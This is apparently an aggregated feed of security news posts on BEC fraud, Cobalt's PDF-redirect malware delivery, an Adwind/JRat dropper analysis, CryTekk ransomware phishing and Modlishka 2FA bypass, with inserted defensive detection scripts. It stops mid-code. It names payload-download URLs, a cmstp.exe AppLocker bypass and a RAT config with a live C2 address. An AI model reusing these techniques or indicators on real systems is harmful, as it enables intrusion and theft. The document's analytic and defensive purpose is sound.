Not only have London Blue’s tactics remained the same over the last few years, but its BEC attack isn’t all that complicated. According to Agari’s report, the threat group uses a throwaway email address and changes the display name to match the CEO or CFO of a company. Attackers then send an email to the target financial executive — from their collection of email addresses — asking them to initiate a money transfer for some made-up reason. If London Blue gets a response from the victim, it replies with one or two bank accounts that they control for the money transfer.
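The display-name trick described above is detectable at the mail gateway without any content analysis: a known executive's name in the From: display name on an address outside the company's own domain is the signal. The following checker is an added example, not tooling from Agari or the report; the executive roster (`EXECUTIVES`), the domain `example.com` and the sample headers are constructed for the demo.

```python
"""Flag mail whose From: display name matches a known executive but whose
address is outside the company's own domain (display-name deception).

Added example, not from the Agari report; the executive roster, the domain
and the sample headers below are constructed."""
import re
from email.header import decode_header
from email.utils import parseaddr

# Hypothetical roster: names staff would recognise, and the only domain their
# genuine mail comes from.
EXECUTIVES = {"jane doe": "CEO", "john roe": "CFO"}
INTERNAL_DOMAIN = "example.com"


def decode_words(raw_header):
    """Decode RFC 2047 encoded-words (=?UTF-8?B?...?=) into plain text."""
    parts = []
    for chunk, charset in decode_header(raw_header):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", "replace")
        parts.append(chunk)
    return "".join(parts)


def normalise(name):
    """Collapse case and whitespace so 'Jane  DOE' matches 'jane doe'."""
    return re.sub(r"\s+", " ", name).strip().lower()


def check_from(raw_from):
    """Return a finding dict when the header impersonates an executive, else None."""
    name, addr = parseaddr(decode_words(raw_from))
    role = EXECUTIVES.get(normalise(name))
    if role is None:
        return None                      # no executive name in the display name
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    if domain == INTERNAL_DOMAIN:
        return None                      # the executive's real address
    return {"name": name, "role": role, "address": addr,
            "reason": "executive display name on an external address"}


def scan_headers(from_headers):
    """Apply check_from to a batch of raw From: values and keep the hits."""
    return [hit for hit in map(check_from, from_headers) if hit]


# Constructed sample headers; the second and third mimic the throwaway-address
# pattern described in the text, the others are benign.
SAMPLE_FROM_HEADERS = [
    "Jane Doe <jane.doe@example.com>",
    "Jane Doe <jane.doe.office@webmail.example.net>",
    "=?UTF-8?B?Sm9obiBSb2U=?= <payments-desk@webmail.example.net>",
    "Vendor Billing <billing@vendor.example.org>",
]

if __name__ == "__main__":
    for hit in scan_headers(SAMPLE_FROM_HEADERS):
        print(f"{hit['role']} impersonation: {hit['name']} <{hit['address']}>")
```

The RFC 2047 decoding step matters: a display name can be hidden behind an encoded-word (`=?UTF-8?B?...?=`), so a rule that only matches on the raw header string would miss it. In production the roster would come from the directory service and the rule would feed a quarantine or banner policy rather than a print statement.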

Go Back to Security Basics

There’s no reason to believe that the rise in senior-level phishing attacks is going to stop anytime soon. So what are the best tactics to prevent this type of attack?

The easiest solution, of course, is to avoid clicking on links or attachments that appear suspicious. Even if an email seems to be legitimately coming from someone you know, it’s best to think twice before clicking or replying.

“We’ve been accustomed to just simply reacting or responding to emails,” said Hassold. “That’s how we do business, but I think part of what we need to do is take a second to stop and think about what we’re looking at before we take any action.”

Like anything related to security, doing your due diligence is a must, even for day-to-day emailing. While security awareness training for the C-suite is never a bad idea, in the case of a BEC attack, it may not be immediately helpful. Because these attacks have such a low overall success rate, you’d need a perfect 0 percent click rate in security awareness simulations to completely prevent them. Additionally, in Hassold’s experience, CEOs and CFOs are generally less receptive to security awareness training.

“They are extremely busy doing a lot of other different types of activities, so sitting down and having them learn about what the threats are to the business is difficult,” he explained.

CSOs and CISOs: Brush Up on Your Marketing Skills

Instead of awareness training, your chief security officer (CSO) or chief information security officer (CISO)’s time may be better spent making sure other executives understand cyber risks in a way that resonates with them — for example, by showing financial executives real-world incidents that have cost companies millions of dollars. No executive wants his or her company to be the next Maersk; the container shipping conglomerate lost up to $300 million and had to reinstall 45,000 PCs and 4,000 servers after being hit by NotPetya ransomware in 2017, according to ZDNet.

I recall having a long conversation about security awareness with the CSO of a large beverage company, who told me that when it comes to convincing other executives of the importance of security, you need to act like the marketing department and sell them on the concept. This CSO often has her team create pitch decks full of real-world examples to underscore the importance of proper security hygiene. This tactic can work wonders when executed effectively.

Don’t Underestimate the Threat of Business Email Compromise

For Hassold, the biggest takeaway from Agari’s report is how groups like London Blue acquire their information.

“These groups are using legitimate services used by sales teams all over the world to curate their targets,” he said.

Using popular sales prospecting tools, threat groups can narrow targets by granular demographics and export them into a nice CSV file. The report concluded that “the pure scale of the group’s target repository is evidence that BEC attacks are a threat to all businesses, regardless of size or location.” Agari also predicted that the use of legitimate services for malicious means will increase in the future.

Business email compromise attacks are clearly a major threat for IT and security leaders to keep an eye on as attackers continue upping their game and making their emails look more legitimate. A strong security culture, combined with a back-to-the-basics approach to security training, can help enterprises avoid being on the receiving end of a successful attack.

The post Why You Should Be Worried About London Blue’s Business Email Compromise Attacks appeared first on Security Intelligence.

Security Affairs: Cobalt cybercrime gang abused Google App Engine in recent attacks

The Cobalt cybercrime gang has been using Google App Engine to distribute malware through PDF decoy documents.

The Cobalt hacking group has been using Google App Engine to distribute malware through PDF decoy documents. The group has targeted more than 20 government and financial institutions worldwide.

The Cobalt crime gang is a Russian hacking crew that has been active since at least 2016 and has targeted banks worldwide. The group leverages spear-phishing emails to compromise target systems, spoofing emails from financial institutions or from a financial supplier or partner.

In August, security experts from Netscout’s ASERT uncovered a campaign carried out by the group that targeted the NS Bank in Russia and Carpatica/Patria in Romania.

Recently, the hacking crew leveraged URL redirection in PDF decoy documents to deliver malicious payloads to the victims. The threat actors used HTTPS URLs pointing to Google App Engine; with this technique the attackers attempt to trick the victim into believing they are accessing a resource from Google.


Attackers used specially crafted PDF documents created with Adobe Acrobat 18.0 that contained the malicious URLs in a compressed form.

“Most of the PDF’s we observed were created using Adobe Acrobat 18.0. They contained the malicious URL in a compressed form in the PDF stream using Flat Decode (Filter/FlateDecode).” reads the analysis published by Netskope.

“Similarly, all the decoys used HTTPS URLs for delivering the payload.”

This specific URL redirection case is classified as Unvalidated Redirects and Forwards as per the Open Web Application Security Project (OWASP).

“Once the URL is accessed, the user is logged out from appengine.google.com and a response status code ‘302’ is generated for URL redirection. As this action gets executed, the user is in turn redirected to google.com/url using the query “?continue=”.  Using this redirection logic, the destination landing page is reached,” continues the analysis. 
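Two details above drive detection: the URI lives inside a FlateDecode-compressed stream, so a plain-text grep over the PDF finds nothing, and the URI itself is a redirect through a trusted host whose `continue=` parameter carries the real landing page. The scanner below inflates the streams, pulls out `/URI` actions and resolves the redirect destination. It is an added example, not Netskope's tooling; the PDF it scans is built inline, and the `PLACEHOLDER-PATH` on appengine.google.com is a stand-in, not the path used in the campaign. The stream parser is demo-grade (direct `/Length` values, no nested dictionaries).

```python
"""Inflate the FlateDecode streams of a PDF, pull out /URI link targets, and
report links that bounce through a trusted host's redirect (`continue=`).

Added example, not Netskope's tooling; the PDF is constructed inline and the
appengine.google.com path used in it is a placeholder, not the real one."""
import re
import zlib
from urllib.parse import parse_qs, urlparse

# Stream object header: a flat dictionary, then the keyword `stream` and a newline.
STREAM_START_RE = re.compile(rb"<<([^<>]*)>>\s*stream\r?\n")
LENGTH_RE = re.compile(rb"/Length\s+(\d+)")
# URI action entries inside decoded object data.
URI_RE = re.compile(rb"/URI\s*\((https?://[^)\s]+)\)")

TRUSTED_REDIRECTORS = ("appengine.google.com",)


def decoded_streams(pdf_bytes):
    """Yield the content of each stream, inflating those marked /FlateDecode."""
    for m in STREAM_START_RE.finditer(pdf_bytes):
        dictionary = m.group(1)
        length = LENGTH_RE.search(dictionary)
        if not length:
            continue            # indirect /Length references are out of scope here
        start = m.end()
        body = pdf_bytes[start:start + int(length.group(1))]
        if b"/FlateDecode" not in dictionary:
            yield body
            continue
        try:
            yield zlib.decompress(body)
        except zlib.error:
            continue            # corrupt or truncated stream: skip, don't abort


def extract_uris(pdf_bytes):
    """All http(s) URIs found in /URI actions, including inside compressed streams."""
    found = []
    for data in decoded_streams(pdf_bytes):
        found.extend(m.decode("latin-1") for m in URI_RE.findall(data))
    return found


def redirect_target(uri):
    """Final host if `uri` redirects via a trusted host's continue= parameter, else None."""
    parsed = urlparse(uri)
    if parsed.hostname not in TRUSTED_REDIRECTORS:
        return None
    destination = parse_qs(parsed.query).get("continue")
    return urlparse(destination[0]).hostname if destination else None


def analyse(pdf_bytes):
    """(uri, redirect destination or None) for every link in the document."""
    return [(uri, redirect_target(uri)) for uri in extract_uris(pdf_bytes)]


def build_sample_pdf(uri):
    """Constructed minimal PDF holding one URI action inside a FlateDecode stream,
    the way an object stream would store it; only enough structure for the demo."""
    action = b"<< /S /URI /URI (" + uri.encode() + b") >>"
    body = zlib.compress(action)
    return (b"%PDF-1.7\n1 0 obj\n<< /Type /ObjStm /Filter /FlateDecode /Length "
            + str(len(body)).encode() + b" >>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")


# Constructed: placeholder path; `continue=` carries the actual landing page.
SAMPLE_URI = ("https://appengine.google.com/PLACEHOLDER-PATH"
              "?continue=https://landing.example.test/stage1")
SAMPLE_PDF = build_sample_pdf(SAMPLE_URI)

if __name__ == "__main__":
    for uri, dest in analyse(SAMPLE_PDF):
        print(uri, "->", dest or "(no redirect)")
```

The useful output for triage is the pair: the visible host (trusted, which is why allow-listing it in the PDF reader or proxy defeats the prompt described next) and the `continue=` destination, which is the host worth reputation-checking and blocking.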

PDF readers prompt a security warning when the document connects to a website, but once "remember this action for this site" is checked for a domain, the warning is no longer displayed. There are two possible scenarios:

  • the prompt refers to appengine.google.com, which victims will likely allow, so the reader reaches the website;
  • appengine.google.com has been whitelisted by administrators for legitimate reasons, so the prompt is not displayed at all.

The Cobalt crime group used PDFs that downloaded a Microsoft Word document with obfuscated macro code. Once the victim enables the macro, another stage payload is downloaded.

“On enabling the option, the macro gets executed and downloads another stage payload from transef[.]biz/fr.txt. The stage payloads are often used by threat actors to ensure a smoother transition and to make an attack harder to detect, investigate and mitigate” continues the analysis.

“fr.txt is detonated using Microsoft Connection Manager Profile Installer (cmstp.exe) from the location, %Appdata%\Roaming\Microsoft\26117.txt as an INF file”

The attack technique resembles the Squiblydoo method, in which malicious scriptlets are loaded using native Windows applications; it allows bypassing application whitelisting solutions such as Windows AppLocker.

“At the time of analysis, the next stage payload “fr.txt” was down and not serving any payload. Though the payload was down, we leveraged our Netskope Threat Intelligence to attribute these attacks to an infamous threat actor group named ‘Cobalt Strike’,” concludes the analysis.

Pierluigi Paganini

(SecurityAffairs – Cobalt, Google App Engine)


The post Cobalt cybercrime gang abused Google App Engine in recent attacks appeared first on Security Affairs.




The Story of Manuel’s Java RAT.

Security experts from Cybaze-Yoroi ZLab investigated two malicious spam campaigns delivering a Java RAT that show some similarities.

Introduction

During the last weeks, the Cybaze-Yoroi ZLab researchers identified infection attempts aimed at installing RAT malware, directed at the naval industry sector. The malicious email messages contained a particular Adwind/JRat variant delivered via several methods tailored to lure the target company.

In the recent past, similar attack cases hit this industry, such as the MartyMcFly case, where the attackers weaponized their emails with QuasarRAT payloads. In this case, instead, Cybaze-Yoroi ZLab detected the usage of multiplatform Java malware.

Technical analysis

A preliminary analysis of the two malicious email waves shows no strict common indicators: the SMTP infrastructure detected on the 16th and 17th differs from the one used on the 21st; the attachment types do not match (the first wave carried .jar attachments, the second ZIP archives and JS scripts); and the email themes were different too.

In detail, the first email wave was prepared to simulate a purchase order, trying to impersonate administrative personnel of an Italian company operating in the hydraulic and lifting sectors, “Difast Srl”. These messages were written in Italian.

The second email wave, instead, was no longer in Italian. This time the attackers were trying to impersonate a German logistics company, “Dederich Spedition”, simulating another kind of purchase order communication.

However, we figured out these two email waves were linked to the same attacker.

Dissecting the Stage1

The following attachments have been analyzed by the Cybaze-Yoroi ZLab team:

Hash (SHA-256): a17b18ba1d405569d3334f4d7c653bf784f07805133d7a1e2409c69c67a72d99
Threat: JAR/Dropper
ssdeep: 12288:1zdaHanWmyPL64RrYzX/6ZjHfTMmy7KUBjycRKXsfp330VPMsCXtZcLzSU:1zUHanW3DJRr0/ubfTK3hycjfx30VPMw

Hash (SHA-256): cb5389744825a8a8d97c0dce8eec977ae6d8eeca456076d294c142d81de94427
Threat: JAR/Dropper
ssdeep: 12288:LR9aQ+oSsyJZVqhoae1yjocYKLCpOo5q/mOmFgnxhQZMR:C4yuoCoflp1DFOxx

Hash (SHA-256): 5b7192be8956a0a6972cd493349fe2c58bc64529aa1f62b9f0e2eaebe65829be
Threat: JS/Dropper
ssdeep: 12288:Vhz+1VYSCR8TedejbWcGrwmzt7cOk6O6vJX9SxmN6QjH9HJW93awECdf66bC8a:rzbsedejF1k1BXFRVJjXl

The first two malware samples were attached to the suspicious emails sent since 16th January. The last was embedded into the 21st January emails. 

Analyzing the first two JAR archives in detail, it is possible to see that the source code is the same, except for the names of the declared classes. Thus, the analysis is conducted on only one of them.

Figure 2 – Comparison between two jar file dropper

The JS file, on the other hand, has a different structure, as shown in the following figure.

Figure 3 – Code snippet of js file dropper

Despite the different structures of code and programming languages, all the dropper samples have the same encoded payload strings.

The string held in the variable named "duvet" hides another layer of code. The obfuscation is simple: replace every occurrence of the "#@>" sequence with the letter "m", then base64-decode the result. The output of this first decoding step is shown in the following figure:

Table 4 – First step decryption of base64 encoded string

In the code snippet above, a routine checks whether a Java environment is present on the victim machine; if it is not, it downloads a JRE from an external location, a potentially compromised third-party website: "hxxp://www[.]thegoldfingerinc[.]com/images/jre.zip".

Figure 5 – Open directory used by malware to download jre.zip component

After downloading the JRE archive, the malware installs it on the victim machine. At this point, the malware triggers the persistence mechanism and sets the typical “CurrentVersion\Run” registry key.

Figure 7 – Registry key set by the malware

After several further rounds of decoding the nested base64 strings, the final result is:

Figure 8 – result of decrypted code
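The decoding routine described above (token substitution plus repeated base64 decoding, down to the embedded JAR), written out as an added example. This is not Yoroi's code and it does not use the real dropper's strings: the "duvet"/"longText" blobs below are constructed stand-ins built by the obfuscate() helper. It assumes the "#@>" substitution is applied at every layer (harmless if it is not, since the token never appears in valid base64) and recognises the final payload by the ZIP header that every JAR carries.

```python
import base64
import binascii
import re

TOKEN = "#@>"               # sequence the dropper writes where the letter "m" belongs
ZIP_MAGIC = b"PK\x03\x04"   # a JAR is a ZIP archive: a layer starting like this is the final payload


def decode_layer(blob: str) -> bytes:
    """Undo one obfuscation layer: restore 'm', drop whitespace, strict base64 decode."""
    restored = "".join(blob.replace(TOKEN, "m").split())
    return base64.b64decode(restored, validate=True)


def peel(blob: str, max_rounds: int = 32):
    """Decode nested layers until a ZIP/JAR header appears or the data stops
    being base64. Returns (text_layers, payload): the decoded text layers,
    outermost first, and the binary payload if a ZIP header was reached
    (None otherwise)."""
    layers, current = [], blob
    for _ in range(max_rounds):
        try:
            raw = decode_layer(current)
        except (binascii.Error, ValueError):
            break                       # not base64 any more: this layer is plaintext
        if raw.startswith(ZIP_MAGIC):
            return layers, raw
        try:
            current = raw.decode("utf-8")
        except UnicodeDecodeError:
            break
        layers.append(current)
    return layers, None


ASSIGN_RE = re.compile(r'(?:var\s+)?(\w+)\s*=\s*"([^"]*)"')


def string_vars(script: str) -> dict:
    """Collect string variables (duvet, longText, longText1, ...) from a decoded stage."""
    return dict(ASSIGN_RE.findall(script))


# --- constructed sample, standing in for the real dropper's strings -----------
def obfuscate(data: bytes, rounds: int) -> str:
    """Build a nested blob in the form the loop above undoes."""
    out = data
    for _ in range(rounds):
        out = base64.b64encode(out).replace(b"m", TOKEN.encode())
    return out.decode("ascii")


FAKE_JAR = ZIP_MAGIC + b"\x14\x00\x08\x00" + b"\x00" * 26 + b"fake-jar-body"
INNER_STAGE = (
    'var longText = "%s";\nvar longText1 = "%s";\n'
    % (obfuscate(FAKE_JAR, 1), obfuscate(b"listen on localhost:7755", 1))
)
DUVET = obfuscate(INNER_STAGE.encode(), 3)   # three nested layers, like the "duvet" string


def analyze(blob: str = DUVET) -> dict:
    """Peel the outer layers, then pull the embedded JAR out of longText."""
    layers, _ = peel(blob)
    variables = string_vars(layers[-1])          # innermost text layer is the stage script
    _, jar = peel(variables["longText"])
    helper_layers, _ = peel(variables["longText1"])
    return {"rounds": len(layers), "jar": jar, "helper": helper_layers[0]}


if __name__ == "__main__":
    result = analyze()
    print("layers peeled:", result["rounds"])
    print("embedded JAR:", result["jar"][:4], len(result["jar"]), "bytes")
    print("longText1 decodes to:", result["helper"])
```

The strict decode (validate=True) is what makes the loop stop on its own: as soon as a layer contains a character outside the base64 alphabet it is treated as plaintext, which is where the variable names are harvested for the next hop.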

The “longText” variable hides the final payload: another .jar file. Instead, decoding the variable “longText1”, we retrieved the following code snippet:

Figure 9 – fake listener on localhost set by the malware in case of evasion

This code, which creates a localhost listener (a sort of proxy) on port 7755, is never actually used by the rest of the RAT.

Converging to the Java RAT Payload

As anticipated, the "longText" variable encodes a JAR executable containing the infamous multi-platform (Windows/macOS) Adwind/JRat malware, a Remote Access Tool well known to the InfoSec community.

Hash (SHA256): 9b2968eaeb219390a81215fc79cb78a5ccf0b41db13b3e416af619ed5982eb4a
Threat: Adwind/JRAT
ssdeep: 12288:jz8uQYmMzFIXJ9A2G5pxogQNUhIK/0c2qnAv:EuQ/ImYnsS7B2qnk

The code structure shown in the following figure indicates that this is the canonical Adwind/JRat malware, including the "JRat.io" false flag.

Figure 10 – Structure of JRat malware

Finally, we extracted the configuration of the RAT payload, the JSON object reported in the following snippet.

{
  "NETWORK": [
    {
      "PORT": 9888,
      "DNS": "185.244.30.93"
    }
  ],
  "INSTALL": true,
  "MODULE_PATH": "KXA/Gzd/Sb.Po",
  "PLUGIN_FOLDER": "vuVCbHOEGdl",
  "JRE_FOLDER": "bvDMbv",
  "JAR_FOLDER": "oJYFGyiYDKG",
  "JAR_EXTENSION": "gHPrve",
  "ENCRYPT_KEY": "PqKOsNWuSwYdlCTuCJPnAGXoL",
  "DELAY_INSTALL": 2,
  "NICKNAME": "MANUEL1986",
  "VMWARE": false,
  "PLUGIN_EXTENSION": "xSgaW",
  "WEBSITE_PROJECT": "https://jrat.io",
  "JAR_NAME": "GErbOAiLUBf",
  "JAR_REGISTRY": "NVxqGXNfpjm",
  "DELAY_CONNECT": 2,
  "VBOX": false
}

The remote address 185.244.30.93, belonging to the "Stajazk VPN" service, hosts the control server, reachable on port tcp/9888. The configuration also reveals a nickname field containing the string "MANUEL1986".

The VPN service hides the attacker's real location; however, the specific IP isn't new to the threat intel community, having been abused since October 2018. Particularly interesting is the presence of the No-IP domain "manuel.hopto.org": back in 2012-2014 this domain also resolved to Nigerian IP addresses in 37076-EMTS-NIGERIA-AS and to the Italian AS1267.

Figure 11 – “manuel.hopto.org” last DNSs of C2 of JRat

Conclusions

The analyzed case shows how threat actors may quickly vary their attack techniques and artifact characteristics, trying to disguise their intent and making their attempts harder to track. It also shows that the investigative capabilities of a threat research team are fundamental to a modern cyber security paradigm.

The specific attack waves are not likely related to the MartyMcFly campaign discovered a few months earlier.

Further details, including IoCs and Yara Rules, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Java RAT, malware)

The post The Story of Manuel’s Java RAT. appeared first on Security Affairs.

Sly criminals package ransomware with malicious ransom note

Ransomware continues to show signs of evolution. From a simple screen locker to a highly-sophisticated data locker, ransomware has now become a mainstream name, even if (historically), it has been around far longer than we want to look back.

Although the criminals behind ransomware campaigns are observed to be refining their approaches—from the “spray and pray” tactic to something akin to wide beam laser precision—they are also fine-tuning their targets. They can single out organizations, companies, and industries; and they can also hold cities and towns for ransom.

Ransomware has also stepped up in sophistication. Criminals have begun introducing certain forms of hybridization in their attacks, either the ransomware file itself is given capabilities outside of its type (e.g., VirRansom and Zcrypt variants that can infect files) or the entire campaign involves one or more threat vectors.

The latest in-the-wild ransomware strain discovered by a group of security researchers known as MalwareHunterTeam (MHT, for short) fits the latter.

Ransomware + phishing: a match made in heaven?

Nothing much is known about this ransomware (which some are already dubbing CryTekk) apart from the wily social engineering tactic built into its ransom note, presumably intended to get as many affected parties as possible to act on the infection and pay. The lure? An additional payment option for affected users who want to retrieve their files but don't have a cryptocurrency wallet.

The ransom note. (Courtesy of MalwareHunterTeam)

Transcription:

YOUR FILES HAVE BEEN ENCRYPTED!

Dear victim:

Files have been encrypted! And Your computer has been limited!

To unlock your PC you must pay with one of the payment methods provided, we regularly check your activity of your screen and to see if you have paid. Paypal automatically sends us a notification once you’ve paid, But if it doesn’t unlock your PC upon payment contact us (CryTekk@protonmail.com)

 Reference Number: CT-{redacted}

When you pay via BTC, send us an email following your REF Number if your PC doesn’t unencrypt. Once you pay, Your PC will de decrypted. However if you don’t within 14 days we will continue to infect your PC and extract all your data and use it.

Google ‘how to buy/pay with bitcoin’ if you don’t know how. To pay by bitcoin: send $40 to your unique bitcoin address.

34ieoNtVEUpcWeVbuxUWXoyANEBBy22TUb

Clicking the yellow “Buy now” button in the small PayPal option box opens a browser tab to direct users to a phishing page asking for card details:

The first PayPal phishing page asking for card details. (Courtesy of MalwareHunterTeam)

After supplying the information wanted and clicking the “Agree and Confirm” button, users are then directed to another phishing page asking for personal information, which they need to fill in to “confirm” their identities:

The second PayPal phishing page asking for personally identifiable information (PII). (Courtesy of MalwareHunterTeam)

After filling in all information, clicking the “Agree and Confirm” button points users to a fake confirmation that the user’s account access is fully restored, which is odd because, as far as the user knows, they were paying the ransom, not addressing a problem about their PayPal accounts. Now, if the user hadn’t already realized that they had been duped twice, at this point they might.

The fake “confirmation” page. (Courtesy of MalwareHunterTeam)

Finally, clicking the “My PayPal” button directs users to the legitimate PayPal login page.

Fool me once, shame on me. Fool me twice…

While ransomware is not as rampant today compared to two years ago, it remains a top threat to consumers and businesses alike. It wouldn’t surprise us at all if the real intent of the criminals behind this campaign is to bank on people’s fear of ransomware to go after their money and credentials.

Files encrypted by this ransomware can be decrypted, as confirmed by MHT's own Michael Gillespie in a tweet. In fact, within two hours of the initial MHT tweet, Gillespie was already offering to decrypt files for possible victims. This confirms what Bleeping Computer stated about the ransomware code being "nothing special." It also suggests that the criminals put more effort into the phishing side of the campaign than into the ransomware itself.

Since most, if not all, ransomware attacks ask for cryptocurrency payment, this attack differentiates itself by offering victims an alternative payment method first, before presenting the Bitcoin option. This leads us to speculate that, although they didn't say it outright, PayPal is the criminals' preferred payment method. Also, $40 in Bitcoin in exchange for decrypting files? That's cheap compared to what the criminals stand to get from victims once they access their accounts using the swiped credentials.

Regardless of whether we see this as a sophisticated ransomware campaign or a “really dope” attempt at phishing, one thing is clear: They are after your money and credentials, so it pays to know when you’re being phished.

It can be frightening to find oneself face-to-face with a ransomware infection, but let us remain calm and keep our heads together. Remember that criminals want us to feel vulnerable, so be and do the opposite. Scrutinize URLs carefully before you enter your credentials or PII. If you feel that something is amiss, follow your gut and don’t proceed any further. If you think you’re stuck and don’t know what to do next, don’t be afraid to ask for help from someone online or in-person who is savvy enough to guide you.

Stay safe out there!

The post Sly criminals package ransomware with malicious ransom note appeared first on Malwarebytes Labs.

The Threat Intelligence Market Segment – A Complete Mockery and IP Theft Compromise – An Open Letter to the U.S Intelligence Community

I recently came across to the most recently published DoD Cyberspace Strategy 2018 which greatly reminded me of a variety of resources that I recently took a look at in terms of catching up with some of the latest cyber warfare trends and scenarios. Do you want to be a cyber warrior? Do you want to "hunt down the bad guys"? Watch out - Uncle Sam is there to spank the very bottom of your digital

Microsoft remains the most impersonated brand, Netflix phishing spikes

Although Microsoft remains the top target for phishers, Netflix saw an incredible surge in December, making it the second most impersonated brand in Q4 2018, according to Vade Secure. Microsoft remains the #1 impersonated brand, receiving more than 2.3 times as many phishing URLs as Netflix. One credential can provide hackers with a single entry point to all of the apps under the Office 365 platform, as well as the files, data, contacts, etc. stored …

The post Microsoft remains the most impersonated brand, Netflix phishing spikes appeared first on Help Net Security.

McAfee Blogs: How Safe is Your Child’s School WiFi?

School WiFi. For many of our digital natives, school WiFi may even be a more important part of their daily life than the canteen!! And that is saying something…

You’d be hard pressed to find a child who rocked up to school without a device in their backpack in our digital age. The vast majority of schools have embraced the many positive learning benefits that internet-connected devices offer our kids. The traditional blackboard and textbook lessons that were confined to the four walls of the classroom are gone. Instead our kids can research, discover, collaborate, create and most importantly, learn like never before.

But in order for this new learning to occur, our kids need to be internet connected. And this is where school WiFi comes into play.

Do Parents Need to Be Concerned About School WiFi?

As parents, we have a responsibility to ensure our kids are safe and not at risk – and that includes when they are using the WiFi at school. Ideally, your child’s school should have a secure WiFi network, but unfortunately that doesn’t mean that it does. School budgets are tight and top-notch secure WiFi networks are expensive, so in some cases security may be jeopardised.

The other factor we shouldn’t ignore is that our batch of digital natives are very tech literate. The possibility that one of them may choose to cause some mayhem to their school WiFi network should also not be ignored!!

At the end of the day, the security of a WiFi network is all about whether it has tight access controls. If it allows only approved devices and people to connect via a secure login then it is more secure than public WiFi. However, if it is open to anyone or easy for anyone to connect to it, then you need to treat it like public WiFi.

What Are the Risks?

An unsecured school WiFi network is as risky as public WiFi, which, according to the Harvard Business Review, is as risky as rolling dice.

Students and staff who use an unsecured WiFi network are at risk of receiving phishing emails, falling victim to a ransomware attack, or even having their data or personal details stolen. There is also a risk that the entire school’s operations could be disrupted, and possibly even shut down, through a DDoS – a Distributed Denial of Service attack.

What Can Parents Do to Ensure Their Kids Are Safe Using School WiFi?

There are several steps parents can take to minimise the risks when their offspring use school WiFi.

  1. Talk To Your School

The first thing to do is speak to your child’s school to understand exactly how secure their network is. I’d recommend asking who has access to the network, what security practices they have in place and how they manage your child’s private data.

  2. Install Security Software

Operating a device without security software is no different to leaving your front door unlocked. Installing security software on all devices, including smartphones, will provide protection against viruses, online threats, risky websites and dangerous downloads. Check out McAfee’s Total Protection security software for total peace of mind!

  3. Keep Device Software Up To Date

Software updates are commonly designed to address security issues. So ensuring ALL your devices are up to date is a relatively easy way of minimising the risk of being hacked.

  4. Schedule Regular Data Back Up

If you are the victim of a ransomware attack and your data is backed up, then you won’t even have to consider paying the hefty fee to retrieve your (or your child’s) data. Backing up data regularly should be non-negotiable, but life can often get in the way. Why not schedule automatic backups? I personally love online backup options such as Dropbox and Google Drive, but you may choose to invest in an external hard drive instead.

  5. Public Wi-Fi Rules?

If, after talking to your school, you aren’t convinced that your child’s school WiFi network is secure, then I recommend that your kids treat it as if it were public WiFi. This means that they should NEVER conduct any financial transactions over it and never share any personal details. But the best way of keeping your child safe on an unsecured WiFi network is to use a Virtual Private Network (VPN). A VPN like McAfee’s Safe Connect creates an encrypted tunnel, so anything sent over the WiFi is protected from anyone eavesdropping on that network.

As a mum of 4, I am very keen to ensure my kids are engaged with their learning. And in our digital times, this means devices and WiFi. So, let’s support our kids and their teachers in their quest for interactive, digital learning but please don’t forget to check in and ensure your kids are as safe as possible while using WiFi at school.

Take Care

Alex xx

The post How Safe is Your Child’s School WiFi? appeared first on McAfee Blogs.

DHS Warns Federal Agencies of DNS Hijacking Attacks

The U.S. Department of Homeland Security (DHS) on Tuesday issued an emergency directive instructing federal agencies to prevent and respond to DNS hijacking attacks.

Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge

Multiple news reports about the defeat of two-factor authentication (2FA) have been making rounds lately.

In November 2018, our friends at ESET discovered a purported Android battery utility tool called “Optimization Android” from a third-party app store. This app was designed to steal money from a user’s PayPal account without relying on stolen credentials. It operates by modifying a device’s Accessibility settings and enabling the use of Android’s overlay accessibility feature. This then allows a malicious accessibility service to mimic the user’s clicks to access the legitimate app and wire money to the criminal’s own PayPal address.

Long story short: This method effectively bypasses 2FA.

Then in mid-December, researchers at the Computer Emergency Response Team in Farsi (CERTFA) Lab released a report about “The Return of Charming Kitten,” a fresh slew of state-backed phishing attacks on individuals involved in sanctions against Iran and others, but focusing more on people based in the United States and Israel. State actors have found a way to fool targets into giving away their Gmail and Yahoo! 2-step verification codes.

Days after CERTFA’s report, Amnesty International broke the news that broad, targeted phishing campaigns were set against thousands of human rights defenders (HRDs), journalists, and political actors in countries throughout the Middle East and Northern Africa (MENA). The threat actors behind at least one campaign had also actively and deliberately taken steps to bypass common forms of 2FA.

A mantis lies in wait

The latest means to circumvent 2FA was made public by Polish security researcher Piotr Duszyński not long after the New Year. He called it Modlishka—the English pronunciation of the Polish word ‘mantis’—and described it as “a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side).” It was a tool to aid penetration testers in conducting legitimate tests.

With its release, Duszyński emphasized the effectiveness and seriousness of social engineering attacks. In the wrong hands, a tool like Modlishka can be misused to create a compelling and sophisticated phishing campaign that is significantly easier to use but far more difficult to detect and avoid by users.

Overview of collected information from a simulated phishing campaign (Courtesy of Piotr Duszyński)

How Modlishka works

Modlishka sits between the legitimate website it is impersonating and the phishing website the user is seeing.

For this tool to successfully do its job—and, in turn, for the campaign to work—phishing campaign operators must first make their targets believe that they are on the website they expect to be on so that victims will enter their credentials without suspicion. Any interactions the user makes within the phishing page, including entering credentials, are passed through and recorded by Modlishka first before forwarding them to the legitimate website in real time.

This tool also prompts the user for a token when the account has 2FA enabled. However, the phisher has to be on hand to intercept the 2FA token, especially a time-based one-time password (TOTP), and submit it to the legitimate website before it expires.

Assuming everything went smoothly, the user is then redirected to the legitimate website and successfully logged in to conclude the phishing attack. Below is a video of Modlishka in action.

Courtesy of Piotr Duszyński

How users can protect themselves

To stop Modlishka dead in its tracks, Duszyński advised the use of 2FA hardware tokens, such as Yubikey, RSA SecurID, and the Titan Security Key, that support the Universal 2nd Factor (U2F) standard. According to Matias Brutti, Director of Research and Exploitation at Okta, Push authentication can also render such campaigns less effective.
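Why a relaying proxy of this kind gets past a one-time code but not a U2F key, as an added example (this is not Modlishka's code, nor code from the original post). The TOTP part is the real RFC 6238 algorithm; the U2F part is a simplification in which an HMAC over the same fields (origin hash, counter, client data hash) stands in for the authenticator's per-site ECDSA signature, an assumption made to stay inside the Python standard library. The origins, seed, key and challenge are constructed.

```python
import hashlib
import hmac
import json
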